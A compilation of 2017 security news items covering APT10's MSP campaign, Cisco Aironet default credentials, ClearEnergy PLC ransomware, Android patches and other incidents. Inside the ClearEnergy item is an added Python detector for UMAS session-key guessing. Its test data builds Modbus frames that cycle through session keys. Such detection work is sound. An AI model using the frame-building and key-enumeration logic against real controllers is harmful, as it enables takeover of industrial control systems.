A widespread campaign known to be targeting managed service providers (MSPs) in at least fourteen countries has been tied to the group known as APT10 and is thought to be operating out of China. These are the conclusions of a new report published this week by PwC UK and BAE Systems.

As always with such reports, attribution is down to the weight of circumstantial evidence. The authors detail historical evidence that leads towards APT10, and domain registration timing evidence that suggests operation from within China's timezone. The authors do not suggest that APT10 is state-controlled, but they paint a picture that invites a conclusion that it is at least state-sponsored.

Part of the historical evidence includes an overlap in malware used in attacks previously attributed to APT10. The group is believed to have primarily used Poison Ivy before switching to PlugX; and used both for a period of about nine months. From around mid-2016 it started to 're-tool' and is now using PlugX, ChChes, Quasar and RedLeaves.

There are two big takeaways from this report (PDF): the reality that organizations are still not adequately securing their supply chain; and the potential that the US/China and UK/China agreements to curb economic espionage are now defunct.

The authors describe a campaign that uses well-researched spear-phishing to first compromise MSPs. From here they obtain legitimate credentials to access the MSPs' client networks that align to APT10's targeting profile -- which the authors claim aligns with China's current five-year plan (FYP) for economic growth.

Once on the target network, the attacker moves laterally to locate specific data of interest. This is collected and compressed before being moved back to the MSP and finally sent to a server under the attackers' control. This is a classic supply-chain attack, similar in concept to the iconic Target breach. Organizations are generally getting better at their own security but remain slack over the security of their suppliers -- in this case, their MSPs.

"It is fundamental for organizations to come to terms with the fact that raising their own security posture is essential but not sufficient," warns Donato Capitella, senior security consultant at MWR InfoSecurity; "especially if they are then willing to interweave their IT systems with third parties whose security posture is insufficient. Organizations have to mandate higher security standards if they do not want to see all of their security investment undermined by trivial security mistakes on behalf of their partners. At the same time, third parties that can demonstrably step up their security game will become preferred over time and will undoubtedly have a higher chance to win important contracts in the future."

The question over whether the US and UK accords with China over economic espionage is now defunct is posed, but not answered by the study. The US and UK are only two of fourteen countries affected, so they are not specifically targeted. It is MSPs in all of those countries that are the targets; and we are not told of any specific client organizations breached.

The two accords specify 'economic espionage'; political espionage is still acceptable in both directions. It is perfectly possible, if not likely, that MSPs compromised in America and Britain have not been used for economic gain. Without further information from the authors, we simply do not know.

It is likely that the attackers are the group known as APT10, and it is likely that they are based in China -- but unambiguous attribution and motivation is not possible based on this report. "Overall," comments Israel Barak, CISO of Cybereason, "the notion that China has decreased its efforts since 2015 to conduct economic espionage is preposterous. China is known for using cutouts and sympathetic agents to collect information on their behalf. China, Russia and other nation states frequently outsource wholesale hacking operations to individual groups and companies. In addition to their government services, these companies contract with, and provide services to, other clients. To do otherwise would greatly devalue the plausible deniability that is one of the major benefits of outsourcing. There are many reasons there is an uptick in outsourcing of operations because countries can rapidly expand capabilities in a short period of time, increase plausible deniability of actions, mitigate risk of detection, gain technical expertise that they cannot recruit directly into the government and decrease overall operational costs."

But whether this indicates the end of the two China accords is a different matter. "The most significant challenge for investigators in the UK or US is tying digital activity to a person and organization in this massive breach or any breach for that matter. In reality, we live in a world where as more and more state-sponsored activity is being conducted by corporations, attribution gets even more difficult. To reiterate, it is too early in this particular instance to determine whether the Cameron-Xi accord was broken or is it simply a case of competitive intelligence and cybercrime that must be dealt with bilaterally between Great Britain and China."


Microsoft Finally Reveals What Data Windows 10 Collects From Your PC
6.4.2017 thehackernews Privacy
Since the launch of Windows 10, there has been widespread concern about its data collection practices, mostly because Microsoft has been very secretive about the telemetry data it collects.
Now, this is going to be changed, as Microsoft wants to be more transparent on its diagnostics data collection practices.
Until now, Windows 10 users have had three options (Basic, Enhanced, Full) to select from under the diagnostics data collection section, with no option to opt out of sending their data to Microsoft.
Also, the company has never said precisely what data it collects behind these options, which raised huge privacy concerns among privacy-conscious users.
But now for the first time, Microsoft has revealed what data Windows 10 is collecting from your computer with the release of the Windows 10 Creators Update, bringing an end to nearly two years of its mysterious data collection practices.
The Windows 10 Creators Update, which will be available from April 11 for users to download for free, comes with a revamped Privacy settings section.

During the process of upgrading to the Creators Update, you will be displayed a new Privacy Settings screen that will ask you to toggle the following features:
Location – Allow Windows and apps to request your location and share that data with Microsoft.
Speech Recognition – Allow Cortana and Windows Store apps to recognize your voice and send that data to Microsoft to improve speech recognition.
Tailored experiences with diagnostic data – Allow Microsoft to use diagnostic data from your computer to offer tips and recommendations.
Relevant ads – Allow apps to use advertising IDs to show ads more interesting to you based on your app usage.
What's more, on Wednesday Microsoft published a massive list of diagnostics data – for both the Basic and Full levels of diagnostics – on its TechNet site, showing what data gets collected.
Basic – The Basic level collects a limited set of data that is critical for understanding the device and its configuration. This data includes basic device information, quality-related information, app compatibility, and Windows Store.
Full – The Full level collects data for the following nine categories: common data; software setup and inventory data; product and service usage data; browsing, search and query data; content consumption data; linking, typing, and speech utterance data; and licensing and purchase data.

Windows chief Terry Myerson said in a blog post published Wednesday that Microsoft hoped the transparency would allow users to make "more informed choices" as the company starts rolling out its new Creators update to the operating system.
This increased transparency about diagnostic data collection, two years after the release of Windows 10, is likely Microsoft's response to European Union regulators, who have been publicly pressuring the company about its privacy practices for the past year.
In February, European Union regulators said they were still unsatisfied with the privacy changes announced by Microsoft and were seeking further clarification from the company.
Marisa Rogers, the privacy officer of the Microsoft's Windows and Devices Group, said that the company is planning to "share more information about how [it] will ensure Windows 10 is compliant with the European Union's General Data Protection Regulation."


No More Ransom — 15 New Ransomware Decryption Tools Available for Free
6.4.2017 thehackernews Virus
No More Ransom, so is the Ransomware Threat.
Launched less than a year ago, the No More Ransom (NMR) project has increased its capacity with new partners and new decryption tools added to its now global campaign to combat Ransomware.
Started as a joint initiative by Europol, the Dutch National Police, Intel Security and Kaspersky Lab, No More Ransom is an anti-ransomware cross-industry initiative to help ransomware victims recover their data without having to pay ransom to cyber criminals.
The online website not just educates computer users to protect themselves from ransomware, but also provides a collection of free decryption tools.
Since December, more than 10,000 victims from all over the world have been able to decrypt their locked up devices without spending a penny, using ransomware decryption tools available free of charge on this platform.
Statistics show that most of the website visitors were from Russia, the Netherlands, the U.S., Italy, and Germany.
The platform is now available in 14 languages and hosts 40 free decryption tools, supplied by a range of member organizations, which victims can use to decrypt files locked up by specific strains of ransomware.

The No More Ransom initiative has been joined by thirty new organizations, including Avast, CERT Polska and Eleven Paths (the Telefonica Cyber Security Unit), which shows that the threat is a worldwide issue that needs to be fought together.
The initiative has also welcomed new law enforcement organizations from Interpol, Australia, Belgium, Israel, South Korea, Russia, and Ukraine.
Since December 2016, 15 new ransomware decryption tools have been added to the online portal by partner organizations, offering more decryption possibilities to the victims:
AVAST: Alcatraz Decryptor, Bart Decryptor, Crypt888 Decryptor, HiddenTear Decryptor, Noobcrypt Decryptor and Cryptomix Decryptor
Bitdefender: Bart Decryptor
CERT Polska: Cryptomix/Cryptoshield Decryptor
CheckPoint: Merry X-Mas Decryptor and BarRax Decryptor
Eleven Paths (Telefonica Cyber Security Unit): Popcorn Decryptor
Emsisoft: Crypton Decryptor and Damage Decryptor
Kaspersky Lab: updates to the Rakhni and Rannoh Decryptors
Previously available in English, Dutch, French, Italian, Portuguese and Russian, the No More Ransom site has now added new languages including Finnish, German, Hebrew, Japanese, Korean, Slovenian, Spanish and Ukrainian.
More languages are also expected to be made available soon to assist victims across the world better.


Cisco Patches Critical Flaw in Aironet Access Points

6.4.2017 securityweek Vulnerability
Cisco published an advisory on Wednesday to warn customers that some of the company’s Aironet access points are affected by a critical flaw that could allow an attacker to take complete control of a vulnerable device.

The security hole, tracked as CVE-2017-3834, involves the existence of default credentials that can be used by a remote attacker who has layer 3 connectivity to log in to a device with elevated privileges via SSH.

The vulnerability impacts Cisco Aironet 1830 and 1850 series APs running an 8.2.x version of the Mobility Express software prior to 8.2.111.0. The company pointed out that the weakness can be exploited regardless of whether the device is configured as a master, subordinate or standalone AP.

Cisco has also informed customers of a medium severity shell bypass vulnerability affecting Aironet 1800, 2800 and 3800 series APs. A local attacker with root privileges can exploit the flaw to gain root access to the underlying Linux operating system. This root shell is designed only for advanced troubleshooting and it should not be available to any user, even if they have root privileges.

The networking giant has also published advisories detailing three high severity denial-of-service (DoS) vulnerabilities affecting its Wireless LAN Controller (WLC) software.

These security holes affect the Wireless Multimedia Extensions (WME), IPv6 UDP ingress packet processing, and the web management interface components of the WLC software. Remote or adjacent attackers can exploit the flaws without authentication.

Cisco has released software updates for each of the affected WLC versions. Workarounds are not available.

Most of these vulnerabilities were discovered by Cisco itself and the company said there was no evidence of exploitation in the wild.


Be careful: Cisco Mobility Express, shipped with some Cisco Aironet devices, has a hard-coded password. Fix it!
6.4.2017 securityaffairs Vulnerability

The Mobility Express Software shipped with Cisco Aironet 1830 Series and 1850 Series access points has a hard-coded admin-level SSH password.
Yesterday I wrote about SCADA systems that are currently shipped with an unchangeable hard-coded password, and today I’m here to discuss a similar problem with you.

The Mobility Express Software developed by the IT giant CISCO that is shipped with Aironet 1830 Series and 1850 Series access points has a hard-coded admin-level SSH password.

Cisco Aironet Cisco Mobility Express

The default credentials could be exploited by a remote attacker who has “layer 3 connectivity to an affected device”.

“A vulnerability in Cisco Aironet 1830 Series and Cisco Aironet 1850 Series Access Points running Cisco Mobility Express Software could allow an unauthenticated, remote attacker to take complete control of an affected device.” reads the security advisory. “The vulnerability is due to the existence of default credentials for an affected device that is running Cisco Mobility Express Software, regardless of whether the device is configured as a master, subordinate, or standalone access point. An attacker who has layer 3 connectivity to an affected device could use Secure Shell (SSH) to log in to the device with elevated privileges. A successful exploit could allow the attacker to take complete control of the device”

To discover which release of Cisco Mobility Express Software is running on your device, you can use the Cisco Mobility Express wireless controller web interface or the CLI.
In the web interface, the release number is shown under Management > Software Update.

The security advisory published by the company is part of a wider set that addresses security issues in the Aironet 1830/1850 series.

The problem affects every access point running an 8.2.x release of Cisco Mobility Express Software prior to Release 8.2.111.0, regardless of whether the device is configured as a master, subordinate, or standalone access point.

CISCO has released free software updates that fix the flaw described in the advisory. It is important to remember that customers may only install and receive support for software versions for which they have purchased a license.

Other security issues related to the Aironet technology are:

An input validation bug in the Cisco Wireless LAN Controller (WLC);
An IPv6 UDP denial-of-service (DoS) vulnerability in the WLC; and
A DoS vulnerability in the WLC’s management GUI.
Cisco has already issued security fixes to patch the above problems.


United Cyber Caliphate published a kill list of 8,786 individuals in US, UK
6.4.2017 securityaffairs CyberCrime

Members of the pro-ISIS hacker group United Cyber Caliphate (UCC) have released a new kill list with 8,786 targets in the US and UK.
The pro-ISIS hacking group United Cyber Caliphate (UCC) has released a “kill list” containing the names and addresses of 8,786 individuals in the U.S. and UK. The group published a shocking video online calling for lone wolf attacks on the individuals in the list.

“Kill them wherever you find them.” states the message published by the United Cyber Caliphate (UCC).

The video starts with a warning for the United States:

“We have a message to the people of the U.S. and most importantly your President Trump,” the text on the screen reads.

“Know that we continue to wage war against you. Know that your counter attacks only make us stronger. The UCC will start a new step in this war against you,” the message said.

According to the terror monitor SITE, the United Cyber Caliphate (UCC) first announced the release of the kill list through a private group on Telegram, then published it a few minutes later.

“More than 7,000 of the names were from the U.S.,” a source from the cyber department at SITE told Fox News on Wednesday.

“We’re trying to determine where the list came from and also identify a common theme among all the individuals,” states a spokesman from SITE.

United Cyber Caliphate

Intelligence experts are evaluating the real danger to the people included in the kill list; in the past, the same group of hackers has shared other lists.

“This group has released several ‘kill lists’ in the past and so far there’s been no confirmed incident of someone on the list being directly targeted or attacked,” the source said.

On March 16, 2017, the United Cyber Caliphate (UCC) published a video announcing the death of its leader, Osed Agha, who was killed during a US airstrike. The video promised retaliation for the death of the UCC leader.

Pierluigi Paganini

(Security Affairs – Kill list, United Cyber Caliphate)

TRACterrorism.org @TRACterrorism
United Cyber Caliphate Announces Death of Osed Agha (Hacker IS Kill-List Creator)http://ow.ly/1nSU30a2SiQ
2:05 PM - 19 Mar 2017


Crooks took control over operations of a Brazilian bank for 5 hours
5.4.2017 securityaffairs CyberCrime

Cyber criminals launched a sophisticated cyber heist that compromised the entire DNS infrastructure of a major Brazilian Bank.
A cyber criminal organization took over the online services of a major Brazilian bank for five hours. The hackers compromised the bank's DNS system and intercepted all the connections to the financial institution.

According to Kaspersky Lab, which investigated the incident, the attack was very sophisticated: the attackers used valid SSL digital certificates and Google Cloud to support the phony bank infrastructure.


Kaspersky Lab did not disclose the name of the bank that was the victim of the attack. Crooks compromised 36 domains belonging to the bank, including internal email and FTP servers.
The hackers took control of the bank's DNS account after compromising the bank's Domain Name System (DNS) provider, Registro.br.

It is still unclear how the hackers compromised the DNS provider, but the experts believe the cyber attacks began at least five months prior to the day of the hack.

The attack occurred on October 22, 2016 and lasted five hours, during which the attackers captured the transactions of hundreds of thousands or possibly millions of the bank's customers worldwide. When bank customers tried to access the online services offered by the bank, they were infected with malware posing as a Trusteer banking security plug-in application.

The malware was designed to disable the victim's security solutions and steal login credentials, email contact lists, and email and FTP credentials.

The experts explained that it was the first time they had observed such a massive attack.

“As far as we know, this type of attack has never happened before on such a big scale,” explained Dmitry Bestuzhev, director of Kaspersky Lab’s research and analysis team in Latin America.

The experts at Kaspersky highlighted that the DNS provider Registro.br fixed a cross-site request forgery flaw on its website in January; it is possible the attackers exploited that flaw for the attack.

“Maybe they [the attackers] exploited the vulnerability on that website and got control. Or … We found several phishing emails targeting employees of that registrar, so they could have spear-phished them,” added Kaspersky. “We don’t know how exactly they originally compromised” the DNS provider, he says.

A disconcerting aspect of the story is the fact that the Brazilian bank didn’t enable the two-factor authentication option implemented by Registro.br.

The malicious code targets a specific list of other banks in many countries, including Brazil, the US, the UK, Japan, Portugal, Italy, China, Argentina, and the Cayman Islands.

The attackers used a modular malware that could infect both Windows and Mac OSs.

The malware was identified as Trojan-Downloader.Java.Agent; Trojan.BAT.Starter; not-a-virus:RiskTool.Win32.Deleter; and Trojan-Spy.Win32.Agent.

The crooks also launched a phishing campaign against specific bank clients during the five-hour attack.

The stolen information was sent by the hackers to a server in Canada.

Kaspersky suspects the involvement of a sophisticated Brazilian cybercrime gang.

“They spent five months just waiting. This is not someone who is a newbie,” added Bestuzhev.


ClearEnergy ransomware aims to destroy process automation logic in critical infrastructure, SCADA and industrial control systems.
5.4.2017 securityaffairs ICS

Schneider Electric, Allen-Bradley, General Electric (GE) and more vendors are vulnerable to ClearEnergy ransomware.
Researchers at the CRITIFENCE® Critical Infrastructure and SCADA/ICS Cyber Threats Research Group have demonstrated this week a new strain of ransomware attack aiming to erase (clear) the ladder logic diagram in Programmable Logic Controllers (PLCs). The ransomware, a.k.a. ClearEnergy, affects a massive range of PLC models from the world's largest manufacturers of SCADA and Industrial Control Systems. This includes Schneider Electric Unity series PLCs and Unity OS from version 2.6 and later; PLC models from other leading vendors, including GE and Allen-Bradley (MicroLogix family), have also been found to be vulnerable to the ransomware attack.

Ransomware is a type of malware that infects computers and encrypts their content with strong encryption algorithms, and then demands a ransom to decrypt that data. "ClearEnergy attack is based on the most comprehensive and dangerous vulnerability ever found in Critical Infrastructure, SCADA and ICS Systems, and affects a wide range of vulnerable products from different manufacturers and vendors. These attacks target the most important assets and critical infrastructure, not just because they are easy to attack but also because they are hard to recover," says Brig. Gen. (ret.) Rami Ben Efraim, CEO at CRITIFENCE.

In 2016 we saw a rise in ransomware where the victims were businesses or public organizations that, on the one hand, had poor security and, on the other hand, faced a high cost from losing business continuity. Last year there were reports of targeted ransomware for PCs and other workstations within critical infrastructure, SCADA and industrial control systems. A month ago, scientists from the School of Electrical and Computer Engineering at the Georgia Institute of Technology simulated a limited-scope proof-of-concept ransomware attack (LogicLocker) designed to attack critical infrastructure, SCADA and industrial control systems.

ClearEnergy acts similarly to other malicious ransomware programs that infect computers, encrypt their content with strong encryption algorithms, and then demand a ransom to decrypt that data back to its original form, with one major difference: ClearEnergy is a malicious ransomware attack designed to target Critical Infrastructure and SCADA systems such as nuclear and power plant facilities, water and waste facilities, transportation infrastructure and more.

"Despite the codename ClearEnergy, the vulnerabilities behind ClearEnergy ransomware take us to our worst nightmares, where cyber-attacks meet critical infrastructure. Attackers can now take down our electricity, our water supply and our oil and gas infrastructure by compromising power plants, water dams and nuclear plants. Critical Infrastructure is the place in which terrorists, activists, criminals and state actors can make the biggest effect. They have the motivation, and ClearEnergy shows that they also have the opportunity," says Brig. Gen. (ret.) Rami Ben Efraim, CEO at CRITIFENCE.

Once ClearEnergy is executed on the victim machine, it searches for vulnerable PLCs in order to grab the ladder logic diagram from each PLC and tries to upload it to a remote server. Finally, ClearEnergy starts a timer that triggers a process to wipe the logic diagram from all PLCs after one hour unless the victim pays to cancel the timer and stop the attack.

SCADA and Industrial Control Systems have been found to be weak in recent years against numerous types of attacks that result in damage in the form of loss of service, which translates to a power outage or sabotage. The damage that a ClearEnergy attack can cause to critical infrastructure is high, since it can cause a power failure and other damage to field equipment, making the recovery process slow in most cases and possibly bringing a plant to a halt.

ClearEnergy is based on vulnerabilities CVE-2017-6032 (SVE-82003203) and CVE-2017-6034 (SVE-82003204), discovered by CRITIFENCE security researchers, which expose profound security flaws in Schneider Electric's UMAS protocol. The UMAS protocol suffers from critical vulnerabilities in the form of a badly designed protocol session key, which results in authentication bypass. "UMAS is a Kernel level protocol and an administrative control layer used in Unity series PLC and Unity OS from 2.6. It relies on the Modicon Modbus protocol, a common protocol in Critical Infrastructure, SCADA and industrial control systems, and is used to access both unallocated and allocated Memory from PLC to SCADA system. What worries our researchers is that it may not be entirely patched within the coming years, since it affects a wide range of hardware and vendors," says Mr. Eran Goldstein, CTO and Founder of CRITIFENCE.

Following the disclosure, Schneider Electric confirmed that the Modicon family of PLC products is vulnerable to the findings presented by CRITIFENCE and released an Important Cybersecurity Notification (SEVD-2017-065-01). ICS-CERT, Department of Homeland Security (DHS), released an important advisory earlier this morning. The basic flaw, which was confirmed by Schneider Electric, allows an attacker to guess the weak (1-byte) session key easily (256 possibilities) or even to sniff it. Using the session key, the attacker is able to gain full control of the controller, read the controller's program and rewrite it with malicious code.
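One defensive check the weakness described above suggests, as an added example and not code from CRITIFENCE or Schneider Electric: a small Modbus/TCP parser that flags UMAS traffic from hosts other than the known engineering stations, and a source that cycles through many distinct session-key values (the 256-possibility guessing pattern). It assumes UMAS is carried as Modbus function code 0x5A followed by a 1-byte session key and a 1-byte UMAS function code; the addresses, threshold and frames are constructed for the example.

```python
"""Added example: detecting UMAS session-key guessing in Modbus/TCP traffic.

Assumed frame layout (not taken from the article): UMAS rides on Modbus/TCP
with function code 0x5A, followed by a 1-byte session key and a 1-byte UMAS
function code.  All traffic below is constructed, not captured.
"""
import struct
from collections import defaultdict
from dataclasses import dataclass

MODBUS_PORT = 502
UMAS_FUNCTION = 0x5A        # assumed Modbus function code that wraps UMAS
KEY_GUESS_THRESHOLD = 16    # distinct session keys from one source before alerting


@dataclass
class ModbusFrame:
    src: str
    dst: str
    transaction_id: int
    unit_id: int
    function: int
    data: bytes


def parse_modbus_tcp(src, dst, payload):
    """Parse one Modbus/TCP ADU (7-byte MBAP header + PDU). Returns None if malformed."""
    if len(payload) < 8:
        return None
    tid, proto, length, unit = struct.unpack(">HHHB", payload[:7])
    # Protocol id is always 0 for Modbus; the MBAP length covers unit id + PDU.
    if proto != 0 or length != len(payload) - 6:
        return None
    return ModbusFrame(src, dst, tid, unit, payload[7], payload[8:])


def umas_session_key(frame):
    """Return the 1-byte session key of a UMAS frame, or None for plain Modbus."""
    if frame.function != UMAS_FUNCTION or len(frame.data) < 2:
        return None
    return frame.data[0]


def detect(frames, allowed_stations, threshold=KEY_GUESS_THRESHOLD):
    """frames: iterable of (src_ip, dst_ip, dst_port, payload_bytes).

    Returns a sorted list of (alert_type, src_ip, dst_ip) tuples, one per
    (type, source, PLC) regardless of how many frames triggered it.
    """
    alerts = set()
    keys_seen = defaultdict(set)          # (src, dst) -> distinct session keys
    for src, dst, dport, payload in frames:
        if dport != MODBUS_PORT:
            continue
        frame = parse_modbus_tcp(src, dst, payload)
        if frame is None:
            continue
        key = umas_session_key(frame)
        if key is None:
            continue                       # plain Modbus reads/writes: out of scope here
        # Only engineering stations have a reason to speak UMAS to a PLC.
        if src not in allowed_stations:
            alerts.add(("umas_from_unexpected_host", src, dst))
        # A 1-byte key has 256 values; one source walking through many of them is guessing.
        keys_seen[(src, dst)].add(key)
        if len(keys_seen[(src, dst)]) > threshold:
            alerts.add(("session_key_guessing", src, dst))
    return sorted(alerts)


def build_umas_frame(tid, session_key, umas_func, body=b""):
    """Build a Modbus/TCP ADU carrying a UMAS PDU (constructed test data)."""
    pdu = bytes([UMAS_FUNCTION, session_key & 0xFF, umas_func]) + body
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, 1) + pdu


def sample_traffic():
    """Constructed traffic: one legitimate station, one HMI, one guessing host."""
    plc = "10.0.2.5"
    frames = []
    # Engineering station reusing the session key it was issued (normal behaviour).
    for tid in range(3):
        frames.append(("10.0.1.10", plc, 502, build_umas_frame(tid, 0x2A, 0x04)))
    # HMI doing a plain Modbus Read Holding Registers (function 3): not UMAS.
    hmi_pdu = bytes([0x03, 0x00, 0x00, 0x00, 0x0A])
    frames.append(("10.0.1.20", plc, 502, struct.pack(">HHHB", 7, 0, len(hmi_pdu) + 1, 1) + hmi_pdu))
    # Unknown host trying session keys 0..39 in turn.
    for k in range(40):
        frames.append(("10.0.5.77", plc, 502, build_umas_frame(100 + k, k, 0x04)))
    return frames


def run_demo():
    return detect(sample_traffic(), allowed_stations={"10.0.1.10"})


if __name__ == "__main__":
    for alert in run_demo():
        print(*alert)
```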

"The recovery process from this type of cyber-attack can be very hard and slow in most cases due to a lack of management resources in the field of SCADA and process automation. A slow recovery process multiplied by the number of devices that need to be fixed, as well as configuration restoration, makes the recovery process very painful," says Mr. Alexey Baltacov, Critical Infrastructure Architect at CRITIFENCE.


“Recovering from such an attack would be a slow and tedious process, and prone to many failures. Every plant using PLC’s which is part of a production line and would have dozens of these devices all around the plant. Let’s assume that each PLC is indeed backed-up to its recent configuration. It would take a painstakingly long time to recover each and every one of them to its original status.” Says Mr. Eyal Benderski, Head of the Critical Infrastructure and SCADA/ICS Cyber Threats Research Group at CRITIFENCE. “This restoration process would take a long time, on which the plant would be completely shut down. The costs of that shut down could be substantial, and for critical processes it could affect for more than the down-time, as it is the case with energy plants. Consider a process which relies on keeping a constant temperature for a biological agent or chemical process. Breaking the process chain could require re-initialization that may be days and weeks long. Furthermore, since dealing with the OT network is much more complicated for operational reasons, on many occasions plants don’t even have up-to-date backups, which would require complete reconfiguration of the manufacturing process. Given these complications, plants would very much prefer paying the ransom than dealing with the minor chance that the backups will work as expected. Lastly, let’s assume the backups went on-air as soon as possible, what would prevent the same attack from recurring, even after paying?”

About the author:


CRITIFENCE is a leading Critical Infrastructure, SCADA and Industrial Control Systems cyber security firm. The company developed and provides SCADAGate+, a unique passive cyber security technology and solution designed for Critical Infrastructure, SCADA and Industrial Control Systems visibility and vulnerability assessment, which allows monitoring, controlling and analyzing OT network cyber security events and vulnerabilities easily and entirely passively. The CRITIFENCE development team and the Critical Infrastructure and SCADA/ICS Cyber Threats Research Group are composed of highly experienced SCADA and cyber security experts and researchers from the IDF's Technology & Intelligence Unit 8200 (Israel's NSA) and the Israeli Air Force (IAF).

For more information about CRITIFENCE refer to: http://www.critifence.com


Google Patches 31 Critical Flaws in Android

5.4.2017 secureweek Vulnerebility

Google this week released security updates for Android to resolve numerous Critical remote code execution (RCE) and elevation of privilege (EoP) vulnerabilities in the platform.

Over 100 vulnerabilities were resolved in Android this month, split into two separate sets of patches. A total of 23 bugs were addressed with the 2017-04-01 security patch level, including 6 Critical vulnerabilities, 9 rated High risk and 8 Moderate.

There were 6 Critical RCE issues affecting Mediaserver; High risk flaws such as EoPs in CameraBase, Audioserver, and SurfaceFlinger; information disclosure in Mediaserver; and denial of service (DoS) vulnerabilities in libskia and Mediaserver.

The Moderate severity issues included EoP bugs in libnl and Telephony, along with Information disclosure vulnerabilities in Mediaserver, libskia, and Factory Reset. Overall, Google patched 15 flaws in Mediaserver this month, which proves once again that this is one of the most vulnerable components in Android, after the Stagefright bug was found in it almost two years ago.

The 2017-04-05 security patch level resolves a total of 79 vulnerabilities, 25 of which were rated Critical severity, 39 have a High rating, and 15 are considered Moderate risk, Google’s advisory reveals.

One of the most severe of these vulnerabilities was an RCE issue in Broadcom Wi-Fi firmware. Tracked as CVE-2017-0561 and found by Google Project Zero researcher Gal Beniamini, the issue impacts Nexus, Samsung, and smartphones from other vendors as well. Apple's iOS was also impacted by the bug, and the company released an emergency fix for it earlier this week.

19 other Critical issues were addressed in various Qualcomm components and were released as part of Qualcomm AMSS security bulletins between 2014 and 2016 (a 20th vulnerability considered only High risk was also counted here in Google’s advisory).

The rest of the Critical flaws included RCE issues in kernel networking subsystem and Qualcomm crypto engine driver, along with EoP bugs in MediaTek touchscreen driver, HTC touchscreen driver, and kernel ION subsystem.

The remaining 38 High risk vulnerabilities in this patch level were mostly EoP bugs in kernel sound subsystem, and various drivers, but 2 RCE flaws (in v8 and Freetype), four information disclosure issues (in kernel memory and kernel networking subsystems, Qualcomm TrustZone, and Qualcomm IPA driver), and two DoS flaws (in kernel networking subsystem and Qualcomm Wi-Fi driver) were also resolved.

The 15 Moderate risk issues included EoP and information disclosure issues in various drivers from Qualcomm, Broadcom, and Nvidia (one EoP was addressed in HTC OEM fastboot command and one information disclosure was resolved in kernel media driver).


Flaws in Java AMF Libraries Allow Remote Code Execution

5.4.2017 secureweek Vulnerebility
Deserialization-related vulnerabilities found in several Java implementations of AMF3 can be exploited for unauthenticated remote code execution and XXE attacks, warned CERT/CC.

The security holes were reported to CERT/CC and vendors by Markus Wulftange, senior penetration tester at Code White. Patches have been made available for some of the affected products.

Serialization is the process where an object is converted to a stream of bytes in order to store or transmit that object to memory or a file. The process in which serialized data is extracted is called deserialization and it can lead to significant security flaws if not handled properly.

AMF3, the latest version of Adobe’s Action Message Format, is a compact binary format used to serialize ActionScript object graphs. AMF was first introduced in Flash Player 6 in 2001 and AMF3 has been around since Flash Player 9.

There have been several reports in the past few years about remote code execution vulnerabilities introduced in Java-based applications due to inadequate serialization implementations.

Wulftange has discovered that some Java implementations of AMF3 deserializers introduce potentially serious vulnerabilities, allowing unauthenticated attackers to remotely execute code or cause a denial-of-service (DoS) condition. An XXE flaw reported by the researcher can also lead to disclosure of sensitive data on the server.

CERT/CC’s advisory mentions three vulnerabilities. The first flaw allows an attacker who can spoof or control an RMI (Remote Method Invocation) server to execute code. This security hole is said to affect Atlassian’s JIRA, Exadel’s Flamingo, GraniteDS, Spring spring-flex, and WebORB for Java by Midnight Coders.

The second vulnerability can also be exploited for arbitrary code execution by an attacker who can spoof or control information. This weakness impacts Flamingo, Apache’s Flex BlazeDS and GraniteDS. The XXE flaw has been found to affect the same products along with WebORB.

Some of the vulnerable libraries, such as GraniteDS and Flamingo, have been discontinued. Atlassian and Apache have released patches for the flaws impacting their products.

According to CERT/CC, products from HPE, SonicWall and VMware could also be affected. The organization has advised developers to use versions of JDK that implement serialization blacklisting filters and ensure that their products properly handle deserialized data from untrusted sources.


Cyberspies Target Middle East With Windows, Android Malware

5.4.2017 secureweek Android
A cyberespionage group apparently not linked to any previously known threat actor has been using several Windows and Android malware families in attacks aimed at organizations in the Middle East.

The first report on this group's activities was published last month by Chinese security firm Qihoo 360, which tracks the actor as APT-C-23 and Two-Tailed Scorpion. Researchers at Palo Alto Networks and ClearSky have also conducted a joint investigation into the gang's operations.

According to the security firms, the group uses Windows and Android malware to spy on victims. Qihoo 360 said it observed nearly 85 percent of infections in Palestine, followed by Israel, but Palo Alto also reported seeing victims in Egypt and the United States.

As for the types of organizations targeted, Qihoo reported that educational institutions appeared to be the main target, followed by military organizations, while Palo Alto mentioned media companies.

Palo Alto Networks and ClearSky have dubbed the Windows malware families used by these cyberspies KASPERAGENT and MICROPSIA. The Android threats are being tracked as SECUREUPDATE and VAMP.

The attackers delivered their malware using fake news websites and spear-phishing emails containing Bit.ly shortened links. Two of the Bit.ly links analyzed by researchers had been clicked hundreds of times.

KASPERAGENT, named so based on a “Kasper” string found in several of the analyzed samples, is used as a reconnaissance tool and downloader for other payloads. However, some of the samples include additional capabilities that allow the hackers to steal passwords from Chrome and Firefox, take screenshots, log keystrokes, execute arbitrary commands, exfiltrate files, and update the malware.

The second Windows malware family used by Two-Tailed Scorpion is MICROPSIA, which allows attackers to log keystrokes, capture screenshots, and steal Office documents.

Researchers initially found no connection between the two malware families, but they eventually uncovered a link: an email address used to register the command and control (C&C) domains.

Some of the domains registered with that email address were also found to host Android malware disguised as harmless applications. One of them is SECUREUPDATE, a backdoor that acts as a downloader for other malware.

The second Android malware is VAMP, which can record calls, harvest contact information, access messages, and steal documents from the infected device.

Both the Android and Windows malware attacks also involve phishing websites that attempt to trick users into handing over their credentials.

Palo Alto has discovered roughly 200 samples of the Windows malware and 17 Android malware samples. The security firm has been monitoring the threat since March 2016, but the KASPERAGENT malware had been used since at least July 2015.

"Through this campaign there is little doubt that the attackers have been able to gain a great deal of information from their targets," explained Palo Alto Networks researchers. "The scale of the campaign in terms of sheer numbers of samples and the maintenance of several different malware families involved suggests a reasonably sized team and that the campaign is not being perpetrated by a lone wolf, but rather a small team of attackers."


Researchers Disclose Unpatched Flaws in Schneider Electric PLCs

5.4.2017 secureweek Vulnerebility
Researchers have disclosed the details of two vulnerabilities affecting some of Schneider Electric’s Modicon programmable logic controllers (PLCs) after the vendor failed to provide any status updates or feedback.

A team of experts from Germany-based OpenSource Security discovered the flaws in Schneider’s Modicon M221 PLCs, namely TM221CE16R running firmware version 1.3.3.3.

According to advisories published on Tuesday by the researchers, the vulnerabilities are critical and they can be easily exploited.

One of the flaws is related to the fact that the Project Protection feature, designed to prevent unauthorized access to project files, uses a hardcoded encryption key.

The project’s password is stored in an XML file that is encrypted using the AES algorithm in CBC mode. The problem is that the encryption key is the same for all systems and it cannot be changed, allowing an attacker to decrypt the XML file and obtain the password set by the user.

The password can then be used to access and modify a project via SoMachine Basic, the software designed for programming Modicon controllers.

